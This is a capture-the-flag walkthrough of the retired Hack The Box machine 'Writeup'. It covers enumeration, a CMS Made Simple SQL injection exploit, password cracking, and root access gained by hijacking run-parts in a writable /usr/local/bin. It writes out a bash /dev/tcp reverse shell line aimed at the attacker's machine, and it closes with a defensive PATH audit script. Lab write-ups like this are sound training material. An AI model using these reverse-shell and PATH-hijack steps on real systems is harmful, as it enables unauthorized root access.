HTB Walkthrough: Writeup (retired)
Writeup is a retired box on HTB.

Hostname: Writeup | Difficulty Level: Easy | Operating System: Linux
NMAP scan

We can see port 22 and 80 open.
HTTP Enumeration
Browsing to ‘http://10.10.10.138’ shows a notice that the site was under a DoS attack and is now protected by Eeyore DoS protection. Let’s check for common files such as robots.txt, admin, etc. manually.
We get a hit for ‘http://10.10.10.138/robots.txt’.

It says ‘Disallow: /writeup/’. The disallow directive specifies paths that must not be accessed by the designated crawlers. When no path is specified, the directive is ignored. Browsing to ‘http://10.10.10.138/writeup/’ reveals a web page.
Running gobuster reveals a login page at ‘http://10.10.10.138/admin’.
┌──(kali㉿kali)-[~/labs/HTB/Writeup]
└─$ sudo gobuster dir -t 50 --url http://10.10.10.138/writeup --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
/modules (Status: 301)
/uploads (Status: 301)
/doc (Status: 301)
/assets (Status: 301)
/admin (Status: 401)
If you view the source of ‘http://10.10.10.138/writeup/’, you will see that it is built on ‘CMS Made Simple’.

Google search for ‘CMS Made Simple’ and look for the code: http://www.cmsmadesimple.org/downloads/cmsms. Since it is open source, you can browse the directory structure here: http://svn.cmsmadesimple.org/svn/cmsmadesimple/trunk/. That also reveals that there is an ‘/admin’ portal. Further, you can find the CMS version in ‘/doc/CHANGELOG.txt’, i.e. browse to ‘http://10.10.10.138/writeup/doc/CHANGELOG.txt’. CHANGELOG.txt reveals the version to be ‘2.2.9.1’.
Exploitation
Looking into searchsploit.
┌──(kali㉿kali)-[~/labs/HTB/Writeup]
└─$ searchsploit CMS Made Simple
┌──(kali㉿kali)-[~/labs/HTB/Writeup]
└─$ searchsploit -m php/webapps/46635.py
Using the ‘CMS Made Simple < 2.2.10 - SQL Injection’ exploit.
Prerequisites: install pip for Python 2 and install the ‘termcolor’ package.
i. curl https://bootstrap.pypa.io/get-pip.py --output get-pip.py
ii. sudo python2 get-pip.py
iii. pip --version (make sure it belongs to Python 2)
iv. sudo pip install --upgrade setuptools
v. sudo python2.7 -m pip install termcolor

To identify the type of the password hash found above, use the ‘hash-identifier’ tool; it suggests MD5. So let’s use hashcat to crack the password with mode ‘20’. Save the ‘hash:salt’ in a file; modes 10 and 20 both expect the ‘hash:salt’ format.

Trying the credentials on ‘http://10.10.10.138/writeup/admin’ did not work. Trying SSH with the same credentials logs you in as the ‘jkr’ user, which gives you the user flag.
Privilege Escalation
We do not have execute permissions in /dev/shm, so run ‘pspy’ from the /tmp folder instead. Keep ‘pspy64s’ running in one tab and SSH in from another tab; you will see the entries below (note the one with an incomplete path):
2021/02/15 18:14:08 CMD: UID=0 PID=2454 | sshd: jkr [priv]
2021/02/15 18:14:08 CMD: UID=0 PID=2455 | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
2021/02/15 18:14:08 CMD: UID=0 PID=2456 | run-parts --lsbsysinit /etc/update-motd.d
2021/02/15 18:14:08 CMD: UID=0 PID=2457 | /bin/sh /etc/update-motd.d/10-uname
2021/02/15 18:14:08 CMD: UID=0 PID=2458 | sshd: jkr [priv]
jkr@writeup:/tmp$ which run-parts
/bin/run-parts
jkr@writeup:/bin$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
Since /usr/local/bin comes before ‘/bin’ in the PATH used by that command, we can perform PATH injection. Create a file ‘run-parts’ in ‘/usr/local/bin’. We have privileges to create files in ‘/usr/local/bin’ because jkr is a member of ‘staff’ (from LinEnum.sh):
jkr@writeup:/tmp$ ls -la /usr/local | grep bin
drwx-wsr-x 2 root staff 20480 Feb 15 21:40 bin
drwx-wsr-x 2 root staff 12288 Apr 19 2019 sbin
As per the article at ‘https://raspberrypi.stackexchange.com/questions/67670/what-is-the-purpose-of-group-staff’:
staff: Allows users to add local modifications to the system (/usr/local) without needing root privileges (note that executables in /usr/local/bin are in the PATH variable of any user, and they may “override” the executables in /bin and /usr/bin with the same name).
Contents of file ‘/usr/local/bin/run-parts’ are as follows:
#!/bin/bash
bash -i >& /dev/tcp/<kali-ip>/9876 0>&1
jkr@writeup:/usr/local/bin$ chmod +x run-parts
Open a netcat listener on port 9876 (or any other port) on the Kali machine. SSH in using jkr’s credentials and you will get a root shell in your netcat session, along with the root flag.
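As an added defender-side check (example script written for this page, not part of the original walkthrough): the root cause above is a directory in root’s PATH that a non-root group can write to. The function below takes a PATH string, parses the ‘ls -ld’ line for each directory (the same ‘drwxrwsr-x 2 root staff’ format shown above) and reports every directory that is world-writable or group-writable by a group other than root; the assumed MOTD PATH is the one from the pspy output.

```shell
#!/bin/sh
# Added audit example, not from the original walkthrough.
# List every directory in a PATH string that a non-root user could write to:
# the condition the run-parts hijack in /usr/local/bin relied on.
# Assumes a Linux-style 'ls -ld' line: "drwxrwsr-x 2 root staff ...".

# Prints one line per risky directory: "<dir> <owner>:<group> <mode> <reason>".
# A directory is risky when it is world-writable, or group-writable by a
# group other than root. Directories that do not exist are skipped.
writable_path_dirs() {
    printf '%s\n' "$1" | tr ':' '\n' | while IFS= read -r dir; do
        [ -n "$dir" ] && [ -d "$dir" ] || continue
        # ls -ld "$dir" -> "drwxrwsr-x 2 root staff 20480 Feb 15 21:40 /usr/local/bin"
        set -- $(ls -ld "$dir")
        mode="$1"; owner="$3"; group="$4"
        gw=$(printf '%s' "$mode" | cut -c6)   # group write bit (6th char)
        ow=$(printf '%s' "$mode" | cut -c9)   # other write bit (9th char)
        if [ "$ow" = "w" ]; then
            printf '%s %s:%s %s world-writable\n' "$dir" "$owner" "$group" "$mode"
        elif [ "$gw" = "w" ] && [ "$group" != "root" ]; then
            printf '%s %s:%s %s group-writable\n' "$dir" "$owner" "$group" "$mode"
        fi
    done
}

# The PATH that sshd's MOTD hook used in the pspy output above (assumed fixed here).
audit_motd_path() {
    writable_path_dirs "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
}

# Run against the current system: no output means nothing to fix.
audit_motd_path
```

On the box above this would print ‘/usr/local/bin root:staff drwxrwsr-x group-writable’; the fix is to drop jkr from ‘staff’ or tighten the directory to 755.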